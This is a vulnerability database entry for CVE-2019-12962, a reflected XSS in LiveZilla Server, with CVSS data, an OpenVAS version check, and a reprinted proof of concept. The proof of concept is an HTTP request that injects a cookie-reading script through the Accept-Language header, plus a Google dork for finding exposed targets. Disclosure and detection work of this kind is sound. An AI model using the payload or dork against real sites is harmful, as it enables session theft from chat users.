Search...

CVE-2019-12962

2019-06-25T13:15:00

ID CVE-2019-12962
Type cve
Reporter cve@mitre.org
Modified 2021-04-06T12:56:00

Description

LiveZilla Server before 8.0.1.1 is vulnerable to XSS in mobile/index.php via the Accept-Language HTTP header.

JSON Vulners Source

Initial Source

{"id": "CVE-2019-12962", "bulletinFamily": "NVD", "title": "CVE-2019-12962", "description": "LiveZilla Server before 8.0.1.1 is vulnerable to XSS in mobile/index.php via the Accept-Language HTTP header.", "published": "2019-06-25T13:15:00", "modified": "2021-04-06T12:56:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12962", "reporter": "cve@mitre.org", "references": ["http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html", "https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/"], "cvelist": ["CVE-2019-12962"], "type": "cve", "lastseen": "2021-04-07T09:20:29", "edition": 8, "viewCount": 27, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:49669"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161867"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142531"]}], "modified": "2021-04-07T09:20:29", "rev": 2}, "score": {"value": 2.5, "vector": "NONE", "modified": "2021-04-07T09:20:29", "rev": 2}, "twitter": {"counter": 2, "modified": "2021-02-02T07:12:50", "tweets": [{"link": "https://twitter.com/BlogLoki/status/1373138081398714370", "text": "\u3010PoC\u3011CVE-2019-12962"}, {"link": "https://twitter.com/BlogLoki/status/1373138081398714370", "text": "\u3010PoC\u3011CVE-2019-12962"}]}, "vulnersScore": 2.5}, "cpe": [], "affectedSoftware": [{"cpeName": "livezilla:livezilla", "name": "livezilla", "operator": "lt", "version": "8.0.1.1"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": [], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:livezilla:livezilla:8.0.1.1:*:*:*:*:*:*:*", "versionEndExcluding": "8.0.1.1", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/", "refsource": "MISC", "tags": ["Vendor Advisory", "Exploit"], "url": "https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/"}, {"name": "http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html"}], "immutableFields": []}

{"exploitdb": [{"lastseen": "2021-03-19T08:33:40", "description": "", "published": "2021-03-19T00:00:00", "type": "exploitdb", "title": "LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-12962"], "modified": "2021-03-19T00:00:00", "id": "EDB-ID:49669", "href": "https://www.exploit-db.com/exploits/49669", "sourceData": "# Exploit Title: LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS\r\n# Google Dork: inurl: inurl:/mobile/index.php intitle:LiveZilla\r\n# Date: 18 Mars 2021\r\n# Exploit Author: Cl\u00e9ment Cruchet\r\n# Vendor Homepage: https://www.livezilla.net\r\n# Software Link: https://www.livezilla.net/downloads/en/\r\n# Version: LiveZilla Server 8.0.1.0 and before\r\n# Tested on: Windows/Linux\r\n# CVE : CVE-2019-12962\r\n\r\nGET /mobile/index.php HTTP/1.1\r\nHost: chat.website.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: ';alert(document.cookie)//\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://www.exploit-db.com/download/49669"}], "packetstorm": [{"lastseen": "2021-03-19T17:07:19", "description": "", "published": "2021-03-19T00:00:00", "type": "packetstorm", "title": "LiveZilla Server 8.0.1.0 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-12962"], "modified": "2021-03-19T00:00:00", "id": "PACKETSTORM:161867", "href": "https://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS \n# Google Dork: inurl: inurl:/mobile/index.php intitle:LiveZilla \n# Date: 18 Mars 2021 \n# Exploit Author: Cl\u00e9ment Cruchet \n# Vendor Homepage: https://www.livezilla.net \n# Software Link: https://www.livezilla.net/downloads/en/ \n# Version: LiveZilla Server 8.0.1.0 and before \n# Tested on: Windows/Linux \n# CVE : CVE-2019-12962 \n \nGET /mobile/index.php HTTP/1.1 \nHost: chat.website.com \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \nAccept-Language: ';alert(document.cookie)// \nAccept-Encoding: gzip, deflate \nDNT: 1 \nConnection: close \nUpgrade-Insecure-Requests: 1 \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/161867/livezilla8010-xss.txt"}], "openvas": [{"lastseen": "2019-07-04T18:42:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12962", "CVE-2019-12964", "CVE-2019-12963"], "description": "LiveZilla is prone to multiple cross-site scripting vulnerabilities.", "modified": "2019-07-02T00:00:00", "published": "2019-07-02T00:00:00", "id": "OPENVAS:1361412562310142531", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142531", "type": "openvas", "title": "LiveZilla < 8.0.1.2 Multiple XSS Vulnerabilities", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:livezilla:livezilla\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142531\");\n script_version(\"2019-07-02T04:48:50+0000\");\n script_tag(name:\"last_modification\", value:\"2019-07-02 04:48:50 +0000 (Tue, 02 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-07-02 04:43:32 +0000 (Tue, 02 Jul 2019)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2019-12962\", \"CVE-2019-12963\", \"CVE-2019-12964\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"LiveZilla < 8.0.1.2 Multiple XSS Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_livezilla_detect.nasl\");\n script_mandatory_keys(\"LiveZilla/installed\");\n\n script_tag(name:\"summary\", value:\"LiveZilla is prone to multiple cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"LiveZilla is prone to multiple cross-site scripting vulnerabilities:\n\n - XSS vulnerability in mobile/index.php via the Accept-Language HTTP header (CVE-2019-12962)\n\n - XSS vulnerability in the chat.php Create Ticket Action (CVE-2019-12963)\n\n - XSS vulnerability in the ticket.php Subject (CVE-2019-12964)\");\n\n script_tag(name:\"affected\", value:\"LiveZilla version 8.0.1.1 and probably prior.\");\n\n script_tag(name:\"solution\", value:\"Update to version 8.0.1.2 or later.\");\n\n script_xref(name:\"URL\", value:\"https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/\");\n script_xref(name:\"URL\", value:\"https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/\");\n script_xref(name:\"URL\", value:\"https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos['version'];\nlocation = infos['location'];\n\nif (version_is_less(version: version, test_version: \"8.0.1.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.0.1.2\", install_path: location);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}